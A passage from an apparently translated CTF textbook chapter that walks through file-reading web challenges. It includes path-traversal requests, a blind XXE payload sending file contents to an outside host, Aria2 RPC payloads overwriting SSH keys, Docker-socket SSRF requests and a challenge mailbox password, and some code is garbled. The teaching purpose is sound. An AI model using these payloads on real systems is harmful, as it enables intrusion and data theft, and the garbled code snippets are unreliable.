// UserController.class ... @RequestMapping(value={"/headimg.do"}, method={org.springframework.web.bind.annotation.RequestMethod.GET}) public void UpdateHead(@RequestParam("url") String url) { String downloadPath = this.request.getSession().getServletContext().getRealPath("/")+"/headimg/"; String headurl = "/headimg/" + HttpReq.Download(url, downloadPath); User user = (User)this.session.getAttribute("user"); Integer uid = user.getId(); this.userMapper.UpdateHeadurl(headurl, uid); } ... // HttpReq.class ... public static String Download(String urlString, String path) { String filename = "default.jpg"; if (endWithImg(urlString)) { try { URL url = new URL(urlString); URLConnection urlConnection = url.openConnection(); urlConnection.setReadTimeout(5000); int size = urlConnection.getContentLength(); if (size < 10240) { InputStream is = urlConnection.getInputStream(); ...

【Difficulty】 Easy.

【Knowledge】 The File protocol of Java URL component.

【Challenge solving】 Decompile the Java class bytecode file (JD); Find the vulnerabilities in the source code through code audit.

【Summary】 CTF players must accumulate experience and understand the URL component's protocols. The shared slide after the game is shown in Fig. 1.67.

Fig. 1.67
figure 67

Trick explain

1.3.3.4 BabyIntranet I (SCTF 2018)

【Intro】 This challenge is developed using the Rails framework, and there is a Ruby On Rails remote code execution vulnerability (CVE-2016-0752), and the file can be read arbitrarily (the root cause of the vulnerability is a file inclusion vulnerability).

def show render params[:template] end

Reading the source code reveals that the application uses Rails’ Cookie-Serialize module to construct malicious deserialized data by reading the application's key, which executes malicious code.

#config/initializers/cookies_serializer.rb Rails.application.config.action_dispatch.cookies_serializer = :json

【Difficulty】 Moderate.

【Knowledge】 Ruby On Rails framework arbitrary file read vulnerability; Rails cookies deserialization vulnerability.

【Challenge solving】 Perform fingerprint detection on the application, and find the application developed through the Rails framework through fingerprint information. Then you can find the soft link /layouts/c3JjX21w in the HTML source code, perform Base64 decoding on the part after the soft link, and find that the content is src_ip. Check Rails related vulnerabilities to find dynamic template rendering vulnerabilities (CVE-2016-0752), encode ../../../../../../etc/passwd into Base64 and put it in layouts, then return successfully/ The contents of the /etc/passwd file.

Trying to render the log file (../log/development.log) failed to execute arbitrary code, found no permission to render this file, read all the readable code or configuration files, and found that the cookies_serializer module was used. Try to read the current user's environment variables and find that there is no permission, so try to read /proc/self/environ. After obtaining the key, use the corresponding Ruby deserialization attack module in Metasploit to exploit the vulnerability.

  • 【Summary】 ① Arbitrary file reading through Ruby On Rails remote code execution vulnerability (CVE-2016-0752) (the author modified the vulnerability code and encoded the path using Base64 encoding), as shown in Fig. 1.68.

  • ② The server prohibits the reading permission of the Log, so it is not possible to execute arbitrary code directly by rendering the log. By reading the source code, we can find that Rails' Cookie-Serialize module is used in the application. The processing mechanism of the entire module is to serialize the real session_data and encrypt it in AES-CBC mode and then encode it twice with Base64. The processing flow is shown in Fig. 1.69.

This is also confirmed by the keyword Set-Cookie response from the server, see Fig. 1.70.

Fig. 1.68
figure 68

Result

Fig. 1.69
figure 69

Execution process

Fig. 1.70
figure 70

Result

We can obtain the environment variables saved in /proc/self/environ through arbitrary file reading vulnerabilities, find the secret_key used for AES encryption, and then use secret_key to encrypt malicious serialized data. In this way, when the server performs the deserialization operation, it will trigger the vulnerability to execute malicious code, as shown in Fig. 1.71.

Fig. 1.71
figure 71

Result

1.3.3.5 SimpleVN (BCTF 2018)

【Intro】 The function of the challenge is mainly divided into the following two points.

(1) The user can set a template to be rendered, but this template has certain restrictions. Only “.” and letters and numbers can be used. In addition, the functional API of the rendering template only allows 127.0.0.1 (local) to make requests.

... const checkPUG = (upug) => { const fileterKeys = ['global', 'require'] return /^[a-zA-z0-9\.]*$/g.test(upug) && !fileterKeys.some(t => upug.toLowerCase().includes(t)) } ... console.log('Generator pug template') const uid = req.session.user.uid const body = `#{${upug}}` console.log('body', body) const upugPath = path.join('users', utils.md5(uid), `${uid}.pug`) console.log('upugPath', upugPath) try { fs.writeFileSync(path.resolve(config.VIEWS_PATH, upugPath), body) } catch (err) { ...

(2) In the challenge, an API sends a request through a local proxy. The user enters the URL, and the backend will start the Chrome browser to request this URL, and take a screenshot of the requested page and feed it back to the user. Of course, the URL submitted by the user also has certain restrictions, which must be the locally configured HOST (127.0.0.1). There is a problem here. The HOST part of the URL we pass in the File protocol is empty, so this check can also be bypassed.

const checkURL = (shooturl) => { const myURL = new URL(shooturl) return config.SERVER_HOST.includes(myURL.host) }

【Difficulty】 Moderate.

【Knowledge】 The protocol supported by the browser and the use of view-source; Node template injection; HTTP Request Header: Range.

【Challenge solving】 Through auditing the source code, we found the template injection vulnerability and the server-side browser request rule and found the solution direction: get the path of the flag, and read the content of the flag.

... const FLAG_PATH = path.resolve(constant.ROOT_PATH, '********') ... const FLAGFILENAME = process.env.FLAGFILENAME || '********' ...

Get the flag file name by injecting process.env.FLAGFILENAME through the template, then get the directory where the entire Node application is located by injecting process.env.PWD through the template and use view-source: to output the result parsed into HTML tags, as shown in Fig. 1.72.

Fig. 1.72
figure 72

Result

Read the FLAG_PATH in config.js using file://+ absolute path. See Fig. 1.73.

Fig. 1.73
figure 73

Source code

Read the contents of the flag, and use the Range keyword in the HTTP request header to control the start byte and end byte of the output. The content of the flag file in this challenge is so large that direct requests cannot output the real part of the flag, which needs to be truncated in the middle, see Fig. 1.74.

Fig. 1.74
figure 74

Result

  • 【Summary】 ① The arbitrary file reading vulnerability in the challenge has nothing to do with NodeJS. In essence, it uses the protocol supported by the browser, which is a relatively new challenge.

  • ② The principle of reading files is to read on demand and not blindly. Reading the contents of files blindly will waste time.

  • ③ The same challenge related to using browser features is SEAFARING2 in the same game, attacking selenium server through SSRF vulnerability, controlling the browser to request file:/// to read local files. Readers can search for this challenge if they are interested.

1.3.3.6 Translate (Google CTF 2018)

【Intro】 According to the {{userQuery}} returned by the challenge, we can quickly think that the challenge is template injection, which can be tested using the mathematical expression {{ 3*3 }}.

{ ... "in_lang_query_is_spelled": "In french, <b>{{userQuery}}</b> is spelled <b ng-bind=\"i18n.word(userQuery)\"></b>." , ... }

Using {{this.$parent.$parent.window.angular.module('demo')._invokeQueue[3][2][1]}} to read some code snippets and found that i18n.template is used to render the template, through i18n .template('./flag.txt') reads the flag.1

figure a

【Difficulty】 Moderate.

【Knowledge】 Node template injection; read flag through i18n.template.

【Challenge solving】 First, find template injection, use template injection to collect information, after obtaining enough information, use template injection, call the file reading function to read the flag file.

【Summary】 The challenge involves knowledge of Node template injection, requiring players to understand the template's syntax; converting the template injection vulnerability into a file reading vulnerability.

1.3.3.7 Watching Animated Get the Flag (PWNHUB)

【Intro】 Scanning the subdomains, I found a site that recorded the challenge environment building process (blog.loli.network) and found that the Nginx configuration file is as follows:

location /bangumi { alias /var/www/html/bangumi/; } location /admin { alias /var/www/html/yaaw/; }

After exploiting the directory traversal, the Aria2 configuration file is found in the parent directory, see Fig. 1.75.

Fig. 1.75
figure 75

Get the Aria2 configuration file

It was also discovered that the Aria2 service is open on port 6800 of the challenge server.

enable-rpc=true rpc-allow-origin-all=true seed-time=0 disable-ipv6=true rpc-listen-all=true rpc-secret=FLAG{infactthisisnotthecorrectflag}

【Difficulty】 Moderate.

【Knowledge】 Nginx misconfiguration leading to directory traversal; Aria2 arbitrary file write vulnerability.

【Challenge solving】 First, collect the necessary information, including directories, subdomains, etc. Nginx configuration errors were discovered during the test (according to the Nginx configuration file obtained in the previous information collection step, the directory traversal vulnerability can also be found directly through black-box testing. The critical condition for performing black-box testing is to understand the features of Nginx and its Possible vulnerabilities. This can also save us the time required for information collection and go directly to the second step of solving the challenge). Use the Ngnix directory to traverse to obtain the Aria2 configuration file, get the rpc-secret, and use the rpc-secret to use the Aria2 arbitrary file writing vulnerability to write the ssh public key to the server.

First, send the following payload to configure the server-side allowoverwrite option to be true.

{ "jsonrpc":"2.0", "method":"aria2.changeGlobalOption", "id":1, "params": [ "token:FLAG{infactthisisnotthecorrectflag}", { "allowoverwrite":"true" } ] }

Then call the API to download the remote file, overwrite any local file (here, directly overwrite the SSH public key), and log in to get the flag through SSH.

{ "jsonrpc":"2.0", "method":"aria2.addUri", "id":1, "params": [ "token:FLAG{infactthisisnotthecorrectflag}", ["http://x.x.x.x/1.txt"], { "dir":"/home/bangumi/.ssh", "out":"Authorized_keys". } ] }

1.3.3.8 The Year 2013 (PWNHUB)

  • 【Intro】 (1) The .DS_Store file is found to exist. See Fig. 1.76.

  • (2) The .DS_Store file leaks the current directory structure. Through analysis of the .DS_Store file, it is found that there are directories such as upload and pwnhub.

  • (3) The pwnhub directory is configured to be forbidden in the Nginx file (the Nginx configuration file cannot be obtained in the early stage of the game and can only be judged by HTTP code 403). The configuration content is as follows.

location /pwnhub/ { deny all; }

  • (4) There is a hidden directory at the same level in pwnhub, the index.php file under it can upload any TAR compressed package, and the Python script is called to automatically decompress the uploaded compressed package, and at the same time, the content of the file with the suffix of .cfg in the compressed package is returned.

<?php // Set the encoding to UTF-8 to avoid garbled Chinese characters. header('Content-Type:text/html;charset=utf-8'); # Quit when no files are uploaded $file = $_FILES['upload']; # Filename Unpredictability $salt = Base64_encode('8gss7sd09129ajcjai2283u821hcsass').mt_rand(80,65535); $name = (md5(md5($file['name']. $salt). $salt).' .tar'); if (!isset($_FILES['upload']) or !is_uploaded_file($file['tmp_name'])) { exit; } # Move files to the appropriate folder if (move_uploaded_file($file['tmp_name'], "/tmp/pwnhub/$name")) { $cfgName = trim(shell_exec('python /usr/local/nginx/html/ 6c58c8751bca32b9943b34d0ff29bc16/untar.py /tmp/pwnhub/'. $name)); and $name)); $cfgName = trim($cfgName); echo "<p>The update configuration is successful, with the following contents</p>"; // echo '<br/>'; echo '<textarea cols="30" rows="15">'; readfile("/tmp/pwnhub/$cfgName"); echo '</textarea>'; } else { echo("Failed!"); } ?> #/usr/local/nginx/html/6c58c8751bca32b9943b34d0ff29bc16/untar.py import tarfile import sys import uuid import os def untar(filename): os.chdir('/tmp/pwnhub/') t = tarfile.open(filename, 'r') for i in t.getnames(): if '...' in i or '.cfg' ! = os.path.splitext(i)[1]: return 'error' else: try: t.extract(i, '/tmp/pwnhub/') except Exception, e: return e else: cfgName = str(uuid.uuid1()) + '.cfg' os.rename(i, cfgName) return cfgName if __name__ == '__main__': filename = sys.argv[1] if not tarfile.is_tarfile(filename): exit('error') else: print untar(filename)

  • (5) By analyzing the Linux crontab tasks, it was found that there exists a cron task.

30 * * * * root sh /home/jdoajdoiq/jdijiqjwi/jiqji12i3198ua x192/cron_run.sh

  • (6) cron_run.sh executes a Python script that sends an email, which reveals the email account and password.

#coding:utf-8 import smtplib from email.mime.text import MIMEText mail_user = 'ctf_dicha@21cn.com' mail_pass = '634DRaC62ehWK6X' mail_server = 'smtp.21cn.com' mail_port = 465 ...

  • (7) Login via the leaked email information and continue to find the leaked VPN account password in the email. See Fig. 1.77.

  • (8) Login to the intranet via VPN and find an Nginx container with a readable flag application, but when accessing the application, only Oh Hacked is displayed, and no other output is available. There is a Discuz! X 3.4 application with Apache as a container on other ports under the same IP.

... $flag = "xxxxxxxxx"; include 'safe.php'; if($_REQUEST['passwd']='jiajiajiajia') { echo $flag; } ...

Fig. 1.76
figure 76

Get .DS_Store

Fig. 1.77
figure 77

Mail content

【Difficulty】 Moderate.

【Knowledge】 Nginx has a vulnerability that allows unauthorized access to a directory, leading to a file reading vulnerability; construct a zip file with a soft link file, upload the zip file and read target files; Discuz!X 3.4 has arbitrary file deletion vulnerability.

【Challenge solving】 Scan the directory to find .DS_Store (a file automatically generated by default under macOS, which is mainly used to record the location of files in the directory, so there will be file names and other information), and get all sub-dirs and files in the current directory by parsing the .DS_Store file.

from ds_store import DSStore with DSStore.open("DS_Store", "r+") as f: for i in f: print i

I found an extra space at the end of the upload directory name and thought that a vulnerability in Nginx parsing (CVE-2013-4547) could be used to bypass the pwnhub directory permissions restriction. The idea is to use the Nginx parsing vulnerability to fail to match the regular expression /pwnhub in the Nginx configuration file, see Fig. 1.78.

Fig. 1.78
figure 78

Result

In the /pwnhub directory, there exists a directory of the same level in which the PHP file exists. Requesting the PHP file, an upload form is found to exist. See Fig. 1.79.

Fig. 1.79
figure 79

Upload form

Upload the TAR archive file through the PHP file, and find that the application will automatically decompress the uploaded archive (tarfile.open), so you can first construct the soft link file locally with the command ln -s, modify the file name to xxx.cfg, and then compress it with tar command. After uploading the TAR package, it will output a soft link to the file's contents (see Fig. 1.80).

Fig. 1.80
figure 80

Result

Reading /etc/crontab reveals that a strange cron task has been started in crontab.

30 * * * * root sh /home/jdoajdoiq/jdijiqjwi/jiqji12i3198ua x192/cron_run.sh

Read the sh script called in crontab and find a Python script running internally; then read the Python script to get the leaked mailbox account and password, log in to the mailbox and get the leaked VPN account and password (see Fig. 1.81).

Fig. 1.81
figure 81

vpn login

After successfully connecting to the VPN, I scanned the VPN's intranet and found the deployed Discuz!X 3.4 application and a flag reading service. Using arbitrary file deletion vulnerability of Discuz!X 3.4 to delete safe.php, see Fig. 1.82.

  • 【Summary】 ① The challenge resolution process is long, and players should have clear ideas.

  • ② In addition to directory traversal caused by improper configuration of Nginx, it also has historical vulnerabilities that can leak information.

The idea of solving this problem is shown in Fig. 1.83. There are many challenges to read arbitrary files by constructing soft links, such as extract0r of 34c3CTF, which will not be introduced in detail here.

Fig. 1.82
figure 82

Get flag

Fig. 1.83
figure 83

Writeup

1.3.3.9 Comment (NetDing Cup 2018 Online)

【Intro】 It starts with a login page, as shown in Fig. 1.84. On the challenge website, it is found that there is a .git directory. The program's source code can be restored through the GitHack tool, and the restored source code can be audited. It is found that there is a secondary injection, as shown in Fig. 1.85.

Fig. 1.84
figure 84

Login form

Fig. 1.85
figure 85

Source code

【Difficulty】 Moderate.

【Knowledge】 Source code leakage caused by the undeleted .git directory; secondary injection (MySQL); read file content through injection vulnerability (load_file) (.bash_history->.DS_Store->flag)

【Challenge solving】 BurpSuite’s Intruder module is used to brute force 3 bytes after the password, and the parameter settings are shown in Fig. 1.86.

Fig. 1.86
figure 86

The parameter settings in burp

Restore the application source code through the leak of the git directory, and find SQL injection (secondary injection) through auditing the source code, and exploit the injection vulnerability, but it is found that there is no flag in the database; try to use load_file to read the content of the /etc/passwd file, and it succeeds. Record the username www and its workdir: /home/www/; read /home/www/.bash_history to find the server’s history commands:

cd /tmp/ unzip html.zip rm -f html.zip cp -r html /var/www/ cd /var/www/html/ rm -f .DS_Store service apache2 start

According to the hint of the content of the .bash_history file, read /tmp/.DS_Store, find and read the flag file flag_ 8946e1ff1ee3e40f.php (note that the load_file result needs to be encoded here, such as using the hex function of MySQL).

【Summary】 This challenge is a typical file reading and exploiting chain. After exploiting MySQL injection, more directory information must be leaked through .bash_history and then read other files in the collected information.

1.3.3.10 The Ark Project (CISCN 2017)

【Intro】 The service of this challenge includes registration and login functions. After logging in with the administrator account, you can upload AVI files and automatically convert the uploaded AVI files into MP4 files.

【Difficulty】 Easy.

【Knowledge】 Use inline comments to bypass SQL injection WAF; exploiting a vulnerability of FFMPEG to read arbitrary files.

【Challenge solving】 When encountering a CTF Web challenge with login and registration functions, first try SQL injection. Through black-box testing, it is found that there are INSERT injection vulnerabilities in the registration stage. When in-depth exploitation, it will be found that there is WAF, and then use inline comments to bypass WAF (/ *!50001select*/), see Fig. 1.87.

Fig. 1.87
figure 87

Bypass WAF

Continue to obtain data through the injection vulnerability, obtain the administrator account, encrypted password, and encryption key (st_key), and obtain the plaintext password through AES decryption.

Use the injected username and password to log in to the administrator account and find the video format conversion function on the administrator page. It is guessed that the content of the challenge is an arbitrary file reading vulnerability of FFMPEG.

Use a known exploit script to generate a malicious AVI file and upload it, download the converted video, and play the video to find that the file content (/etc/passwd) can be successfully read, as shown in Fig. 1.88.

Fig. 1.88
figure 88

Result

According to the contents of the /etc/passwd file, we found that there is a user named s0m3b0dy, and guessed that the flag is in his user directory, i.e., /home/s0m3b0dy/flag(.txt); continued to read the flag through the FFMPEG file reading vulnerability, and found that the flag was successfully obtained, see Fig. 1.89.

Fig. 1.89
figure 89

Get flag

  • 【Summary】 ① This challenge uses a typical method of bypassing SQL injection WAF (inline comments).

  • ② This challenge closely follows hot security issues, and the results of reading files are presented in a novel and interesting way. The principle of the FFMPEG arbitrary file reading vulnerability is mainly that the HLS (HTTP Live Streaming) protocol supports the File protocol, which leads to the ability to read files into the video.

Another distinctive file reading and presentation effect competition is the 2018 Nanjing University of Posts and Telecommunications Competition, which challenged the use of PHP to generate pictures dynamically. The file's content read by the file reading vulnerability can be attached to the picture when exploiting. See Fig. 1.90.

Fig. 1.90
figure 90

Result

1.3.3.11 PrintMD (RealWorldCTF 2018 Online)

【Intro】 The function provided by the challenge can render the content of the online editor Markdown (hackmd) into a printable form. Rendering methods are divided into client-side local rendering and server-side remote rendering.

The client can perform local debugging, and the code for the remote rendering part of the server is as follows:

// render.js const {Router} = require('address') const {matchesUA} = require('browserslist-useragent') const router = Router() const axios = require('axios') const md = require('... /.. /plugins/md_srv') router.post('/render', function (req, res, next) { let ret = {} ret.ssr = !matchesUA(req.body.ua, { browsers: ["last 1 version", "> 1%", "IE 10"], _allowHigherVersions: true }); if (ret.ssr) { axios(req.body.url).then(r => { ret.mdbody = md.render(r.data) res.json(ret) }) } else { ret.mdbody = md.render('# Please wait...') res.json(ret) } }); module.exports = router

The Docker environment exists on the server, and the Docker service is started.

The path of the flag on the server is /flag.

【Difficulty】 Difficult.

【Knowledge】 JavaScript prototype pollution; Axios SSRF (UNIX Socket) attack on Docker API to read local files.

【Challenge solving】 Audit the client-side code obfuscated by Webpack, find the logic related to server-side communication in the application, and de-obfuscate the obfuscated code. The source code obtained is as follows:

validate: function(e) { return e.query.url && e.query.url.starsWith("https://hackmd.io/") }, asyncData: function(ctx) { if(!ctx.query.url.endsWith("/download")){ ctx.query.url += "/download"; } ctx.query.ua = ctx.req.headers["user-agent"] || ""; return axios.post("/api/render", qs.stringify({... .ctx.query})).then(function(e) { return { ... .e.data, url: ctx.query.url } }) }, mounted: function() { if (!this.ssr){ axios(this.url).then(function(t) { this.mdbody = md.render(t.data) }) } }

Then use HTTP parameter pollution to bypass the restrictions of startsWith, and at the same time, use prototype pollution on req.body.url (server), so that the server Axios will be passed into the socketPath and url parameters when requesting. Then use the SSRF vulnerability to attack the Docker API, pull /flag into the Docker container, and call the Docker API to read the files in the Docker.

The specific attack process is as follows.

  • ① pull a lightweight image docker pull alpine:latest=>:.

url[method]=post &url[url]=http://127.0.0.1/images/create?fromImage=alpine:latest &url[socketPath]=/var/run/docker.sock &url=https://hackmd.io/aaa

  • ② create a container docker create -v /flag:/flagindocker alpine --entrypoint "/bin/sh" --name ctf alpine: latest=> :

url[method]=post &url[url]=http://127.0.0.1/containers/create?name=ctf &url[data][Image]=alpine:latest &url[data][Volumes][flag][path]=/flagindocker &url[data][Binds][]=/flag:/flagindocker:ro &url[data][Entrypoint][]=/bin/sh &url[socketPath]=/var/run/docker.sock &url=https://hackmd.io/aaa

Start the container docker start ctf:

url[method]=post &url[url]=http://127.0.0.1/containers/ctf/start &url[socketPath]=/var/run/docker.sock &url=https://hackmd.io/aaa

Retrieve the flag file in the docker.

url[method]=get &url[url]=http://127.0.0.1/containers/ctf/archive?path=/flagindocker &url[socketPath]=/var/run/docker.sock &url=https://hackmd.io/aaa

【Summary】 The challenge is very delicate and novel. Because Axios does not support the File protocol, players need to use SSRF to control other applications on the server to read files.

Similar to the Axios module, which can carry out UNIX Socket communication, there is also the curl component.

1.3.3.12 The Careless Jia Jia (PWNHUB)

【Intro】 The entrance is a Drupal service. Through collecting information, it is found that the FTP service is opened on port 23 of the server, and the FTP service has a weak password. After using the weak password to log in to FTP, it is found that there is Drupal plug-in source code in the FTP directory, and there is SQL injection vulnerability in the Drupal plug-in, and there was a Windows computer in the intranet, and port 80 (Web service) was opened.

【Difficulty】 Moderate.

【Knowledge】 Padding Oracle Attack; Drupal 8.x Deserialization Vulnerability; Special Exploitation Techniques for Windows PHP Local File Inclusion/Reading.

【Challenge solving】 According to the challenge hint, the FTP login password was violently cracked, and it was found that FTP has a weak login password.

An audit of the downloaded plug-in source code reveals a SQL injection vulnerability. Still, user input needs to be decrypted in AES-CBC mode before being brought into SQL statements.

private function set_decrypt($id){ if($c = Base64decode(Base64decode($id))) { if($iv = substr($c, 0, 16)) { if($pass = substr($c,17)) { If($u = openssl_decrypt($pass, METHOD, SECRET_KEY, OPENSSL_RAW_DATA,$iv)) { return $u; } else die("hacker?"); } else return 1; } else return 1; } else return 1; } public function get_by_id(Request $request){ $nid = $request->get('id'); $nid = $this->set_decrypt($nid); //echo $nid; $this->waf($nid); $query = db_query("SELECT nid, title, body_value FROM node_field_data left JOIN node__body ON node_field_data.nid=node__body.entity_id WHERE nid = {$nid}")->fetchAssoc(); return array('#title' => $this->t($query['title']), '#markup' => '<p>' . $this->t($query['body_value']).' </p>',);

By auditing the encrypted process, it was found that the secret text of the SQL injection statement could be forged by the padding oracle attack, see Fig. 1.91, and the SQL injection vulnerability continued to be exploited to get the user's mailbox and mailbox password, see Fig. 1.92.

Fig. 1.91
figure 91

Padding oracle attack

Fig. 1.92
figure 92

Get email&password

Using the mailbox information to log in, we get the leaked online document address in the mailbox, open it to restore the historical version, and find the admin password. The recovered admin password is used for logging in the Drupal’s admin system, and the information in the admin system determines the corresponding version of Drupal, and a deserialization vulnerability is found. The result of constructing a deserialized payload for executing the phpinfo function is shown in Fig. 1.93.

Fig. 1.93
figure 93

phpinfo

After getting the permission to execute arbitrary codes, the intranet could be scanned, and it is found that there is a Windows host with Web service, and this Web service includes a file reading vulnerability.

Continue to test and find a certain WAF. That is, files with dangerous file names cannot be uploaded. Use “<” as a file name wildcard to bypass the WAF, such as “123333<.txt”.

【Summary】 The Padding Oracle Attack is a common Web security attack combined with cryptography, which needs to be learned.

Windows PHP files can be included/read using wildcards, a technique to read files when we do not know the file's name in the directory or when the WAF has set certain rules to intercept it. The corresponding wildcard rules are as follows: on Windows, “>” is equivalent to the regular wildcard “?”, “<” is equivalent to “*”, “"” is equivalent to “. ”.

1.3.3.13 Educational institutions

【Intro】 The server of the challenge has a comment box. The comment box supports XML syntax, which can cause XXE; half of the flags are stored in the configuration file; there is a web service in the intranet.

【Difficulty】 Moderate.

【Knowledge】 Using the XXE vulnerability to read files and perform SSRF attacks.

【Challenge solving】 By scanning the application directory of the website, it was found that the .idea/workspace.xml of the website could be leaked, and in workspace.xml, there was a paragraph of XML entity variables that was commented. The challenge only has one input point, comment, so we test whether there is an XXE vulnerability (input XML header “<?xml version=“1.0” encoding=“utf-8”?> ”, it can be observed that there is an error in the response), see Fig. 1.94.

Fig. 1.94
figure 94

Error in the response

The existence of the XXE vulnerability is basically confirmed by the simplexml_load_string function shown in the corresponding error message, and then an attempt is made to construct a remote entity call to implement the Blind XXE exploit. The data of the constructed exploit is as follows.

<!ENTITY % payload SYSTEM "php://filter/read=convert. Base64-encode/resource=/etc/passwd"> <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://ip/test/?xxe_local=%payload;'>"> %int; %trick;

According to the error message when testing the existence of XXE, you can find the web directory location, read the source code of the web application using the XXE vulnerability, and find that half of the flag content exists in the config.php file.

#/var/www/52dandan.cc/public_html/config.php <?php ... define(SECRETFILE,'/var/www/52dandan.com/public_html/youwillneverknowthisfile_e2cd3614b63ccdcbfe7c 8f07376fe431'); ... ?> #youwillneverknowthisfile_e2cd3614b63ccdcbfe7c8f07376fe431 Ok,you get the first part of flag : 5bdd3b0ba1fcb40 then you can do more to get more part of flag

Then you could search for the other half of the flag and fail. Then guessed that the other half of the flag is in the intranet, so you could read /etc/host and /proc/net/arp to get the intranet IP: 192.168.223.18.

Exploiting the XXE vulnerability to access port 80 of 192.168.223.18 (you can also do a port scan, just guess the common ports here), a web service and SQL injection is found on the 192.168.223.18 host. Use the blind injection to get the other half of the flag.

<!ENTITY % payload SYSTEM "http://192.168.223.18/test.php?shop=3'-(case%a0when((1)like(1))then(0)else(1)end)-'1"> <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://ip/test/?xxe_local=%payload;'>"> %int; %trick;

【Summary】 This challenge examines the file reading and utilization method of PHP XXE vulnerability. The protocol supported by the XML extension of different languages may be different. PHP retains the PHP protocol very distinctively, so you can use the Base64 Filter to encode the content of the file to avoid truncating the Blind XXE due to special characters such as "&" and "<", which may lead to the failure to exploit the vulnerability.

1.3.3.14 Magic Tunnel (RealworldCTF 2018)

【Intro】 Using the Django framework to build a web service that uses pycurl to request incoming links from users.

The source code for the link section of the request is as follows.

... def download(self, url): try: c = pycurl.Curl() c.setopt(pycurl.URL, url) c.setopt(pycurl.TIMEOUT, 10) response = c.perform_rb() c.close() except pycurl.error: response = b'' return response ...

【Difficulty】 Difficult.

【Knowledge】 Attack on uwsgi through SSRF vulnerability.

【Challenge solving】 To read the file:///proc/mounts file through the file reading vulnerability, you can see the mounting status of the Docker directory, as shown in Fig. 1.95.

Fig. 1.95
figure 95

result

After successfully finding the directory, the entire application's source code can be read through the file read vulnerability.

#! /bin/sh BASE_DIR=$(pwd) . /manage.py collectstatic --no-input . /manage.py migrate --no-input exec uwsgi --socket 0.0.0.0:8000 --module rwctf.wsgi --chdir ${BASE_DIR} --uid nobody --gid nogroup --cheaper-algo spare --cheaper 2 --cheaper-initial 4 --workers 10 --cheaper-step 1

Attack uwsgi by exploiting the Gopher protocol through an SSRF vulnerability (injecting SCRIPT_NAME to run malicious Python scripts or directly using EXEC to execute system commands).

【Summary】 This challenge needs to read any file through the File protocol to complete the information gathering on the server, i.e., leaking the application path through /proc/mounts, to know what file to read in the next step.

1.3.3.15 Can You Find Me? (WHUCTF 2019)

【Intro】 There is an obvious file inclusion vulnerability in the challenge, but the known information is that the relative path of the flag... /.. /flag, and a WAF is found when exploiting the file inclusion vulnerability, which prohibits relative path hopping.

<?php error_reporting(0); $file_name = @$_GET['file']; if (preg_match('/\. \cr. /', $file_name) ! == 0){ die("<h1> File names cannot have '...' </h1>"); } ...

【Difficulty】 Easy.

【Knowledge】 File reading vulnerabilities.

【Challenge solving】 Find the web directory by reading the Apache configuration file. See Fig. 1.96.

Fig. 1.96
figure 96

Find the web directory by reading the Apache configuration file

Once the web directory is known, you can construct the absolute path of the flag file directly from the web directory to bypass the relative path restriction and read the flag, see Fig. 1.97.

Fig. 1.97
figure 97

get flag

【Summary】 This is a classic file reading challenge. It mainly examines the ability of players to collect information on Web configuration files. You need to find Web directories by reading Apache configuration files. By constructing absolute paths, you can bypass the restrictions of relative paths to get the flag file.

1.4 Summary

Among CTF’s Web challenges, information collection, SQL injection, and arbitrary file reading vulnerabilities are the most common and basic vulnerabilities. When encountering web-type challenges in the competition, we can first determine whether the above-mentioned web vulnerabilities are contained in the challenge and complete the challenge.

Chapters 2 and 3 will introduce other common vulnerabilities from the "advanced" and "extended" levels involved in web challenges. The web vulnerabilities involved in the "advanced" level require readers to have a certain foundation and experience. The "level" involves more complex vulnerabilities and technical points; the "expansion" level involves more features related to Web challenges, such as Python security issues.